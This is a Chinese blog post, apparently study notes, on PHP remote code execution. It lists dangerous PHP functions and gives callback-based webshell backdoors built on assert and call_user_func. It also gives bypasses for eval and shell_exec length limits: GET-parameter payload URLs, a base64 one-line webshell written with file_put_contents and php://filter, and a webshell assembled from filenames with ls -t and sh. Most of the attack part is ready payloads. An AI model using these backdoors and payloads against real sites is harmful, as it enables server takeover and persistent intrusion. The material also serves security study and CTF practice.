RCE漏洞

已于 2024-08-12 08:56:05 修改
阅读量753 收藏 17
点赞数 18
文章标签: 安全
于 2024-08-11 21:16:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wacjey/article/details/141112052
版权

目录

RCE

相关函数

命令执行

代码执行

RCE回调后门绕过

回调函数

简单的回调后门

eval长度限制突破方法

使用?param=echo$_GET[1];&1=id 来执行我们的命令

使用file_put_contents把文件写到系统后不断以base64编码的方式把命令写入

usort(...$_GET);

RCE

与sql注入的不同在于可以自由删除更改文件,在权限等级高的情况下可以添加删除用户,

在web应用开发中为了灵活性、整洁性等会让应用调用代码执行函数或系统命令执行函数处理,若对用户输入的过滤不严,容易产生远程代码执行漏洞系统命令执行漏洞

相关函数

命令执行

在win上面可以用echo写入命令,用type来读命令

  • system():能够将字符串作为OS命令执行,且返回命令执行结果

  • exec():能够将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)

  • hell_exec():能将字符串作为OS命令执行

  • passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;

  • popen():打开进程文件指针

  • proc_open():与popen()类似

  • pcntl_exec():在当前进程空间执行指定程序;

    反引号:反引号内的字符串会被解析为OS命令;

代码执行

  • eval():将字符串作为php代码执行;

  • assert():将字符串作为php代码执行;

  • preg_replace():正则匹配替换字符串;

  • create_function():主要创建匿名函数;

  • call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数;

  • call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组;可变函数:若变量后有括号,该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行;

RCE回调后门绕过

什么是回调函数?

所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用,这个函数通过接受回调函数的名字和参数来实现对他的调用

回调后门就是必须包含回调函数和回调函数需要的参数的可利用的后门

回调函数

各种具有callable参数的函数我把他称为回调函数

  • call_user_func()

  • call_user_func_array() ---传递数组

  • array_filter()

  • array_map()

  • uasort()

  • uksort()

  • array_reduce()

  • array_udiff()

  • array_walk()

  • array_walk_recursive()

  • register_shutdown_function()

  • filter_var()

  • filter_var_array()

简单的回调后门

assert函数在php7版本被丢弃,注意要把php版本切换到5版本

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8"><?php 
call_user_func('assert',$_REQUEST['Pass']);</span></span>

如下图我可以输入我想要的函数达到我想要的效果

image-20240811170131187

这里可以不加分号,但是如果是用eval()就必须要分号,eval()在php中不是一个标准的函数所以不能使用get和post传参直接传进来

较难的回调后门

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8">$e =$REQUEST[‘e’]; ---将assert的编码传入
$arr array($_POST[‘pass’],); ---我们想要执行的语句 例如phpinfo()
array_filter($arr,base64_decode($e));----将arr数组中的参数放到assert里面去执行</span></span>

eval长度限制突破方法

限制代码 

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8"><?php
$param = $_REQUEST['param']; If (
strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false
) {
eval($param);
}</span></span>

如何在长度限制在17的情况下拿到webshell

使用?param=echo$_GET[1];&1=id 来执行我们的命令
<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8">解释:_GET: 这部分代表了一个参数名,“param”,其值是 echo 后面跟随一个数组索引 $_GET,$_GET 是 PHP 中的一个超全局变量,用于接收 URL 端口传过来的参数。$_GET 表示访问者在地址栏中可能通过 “?1=value” 类似的格式传递的第一个参数。
​
;: 这是一个分隔符,表示参数之间的逻辑独立性。
​
&1=id: 表示让1=id,也就是把我们的系统命令传到了get参数里面</span></span>

我们也可以通过touch来创建一个脚本文件让执行我们的更多语句 ,也是创建成功了如下图

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8">http://192.168.94.134/index.php?param=echo`$_GET[1]`;&1=touch%20/tmp/111.txt</span></span>

使用file_put_contents把文件写到系统后不断以base64编码的方式把命令写入

因为有些特殊字符如^<>?之类的无法在这个函数中显示所以要转成base64

  • N为文件名

  • P为写入的参数

  • 8代表追加

    • 因为c语言底层的file_put_contents的追加参数为8

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8">foo.php?1=file_put_contents&param=$_GET[1](N,P,8); 
foo.php?1=file_put_contents&param=$_GET[1](N,D,8);
foo.php?1=file_put_contents&param=$_GET[1](N,w,8);
​
利用上述的方法把下面的代码一次写进N中
/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' ✲写入文件'N'中   */---一句话木马
foo.php?param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N
再使用php伪协议的方式转成正常语句,再用文件包含执行</span></span>

usort(...$_GET);

通过数组不断传参输入

<span style="background-color:var(--code-bg-color)"><span style="color:#c6c5b8">?1[]=test&1[]=phpinfo();&2=assert</span></span>
usort(...$_GET);

通过数组不断传参输入

?1[]=test&1[]=phpinfo();&2=assert

使用bs进行抓包然后把我们的后调函数写入

Linux命令长度限制突破方法

当我们被限制了linux系统命令的长度我们很多读取文件的命令变得无法执行

限制代码

<?php
$param = $_REQUEST['param']; If ( strlen($param) < 8 ) { echo shell_exec($param);
}

shell_exec就是可以通过shell执行命令并完整的输出以字符串的方式返回

使用> 通过时间顺序把一句话木马通过文件名的方式创建然后执行
w>hp
w>c.p\\
w>d\>\I
w>\-\\
w>e64\
w>bas\
W>7\
w>XSK
W>PD9
w>o\1
w>ech\\
1s-t>0
sh 0

最后我们查看0文件 可以看到里面的一句话木马

image-20240812085441223

最后可以看见我们创建了很多个文件,他们最终可以组成我们的一句话木马

▪w 长度最短的命令 ---w可以不写

▪ls -t 以创建时间来列出当前目录下所有文件

▪文件列表以[行符]分割每个文件

▪引入 \ 转义ls时的换行

▪换行不影响命令执行

▪成功构造任意命令执行,写入Webshell

无字母数字webshell命令执行

通过使用十六进制的反码可以执行我们的命令

Wacjey
关注
ThinkPHP3.2.x RCE漏洞通报1
08-03
【ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1....通过以上分析可以看出,ThinkPHP 5.0.x/5.1.x中的变量覆盖RCE漏洞是由于不安全的数据处理和变量管理造成的。开发者应加强对框架内部实现的理解,并遵循最佳安全实践,以减少类似的安全风险。
RCE漏洞简介
记录学习
06-02 1517
rce漏洞简介
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
ThinkPHP RCE 漏洞利用教程
gitblog_00097的博客
08-15 502
ThinkPHP RCE 漏洞利用教程 ThinkphpRCE项目地址:https://gitcode.com/gh_mirrors/th/ThinkphpRCE 1. 项目目录结构及介绍 在ThinkPHPRCE项目中,主要包含了以下目录和文件: public: 此目录是ThinkPHP框架对外的入口点,通常用于放置index.php以及.htaccess等文件。 runtime: 运行时目...
RCE漏洞复现
qq_43757105的博客
09-14 988
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
深入探讨RCE漏洞及其防御策略
swordcloud_xm的博客
07-31 983
借鉴链接当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7250
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 3560
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
RCE漏洞函数总结
weixin_51692662的博客
08-17 783
php,rce,命令执行,代码执行
Spring Core RCE 漏洞复现
qq_73630656的博客
06-12 667
远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 788
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1219
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 763
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1470
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
安全服务面试
m0_74402888的博客
09-28 674
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
pikachu靶场RCE漏洞
10-13
这是一个关于Pikachu靶场的RCE漏洞的问题。Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用该漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值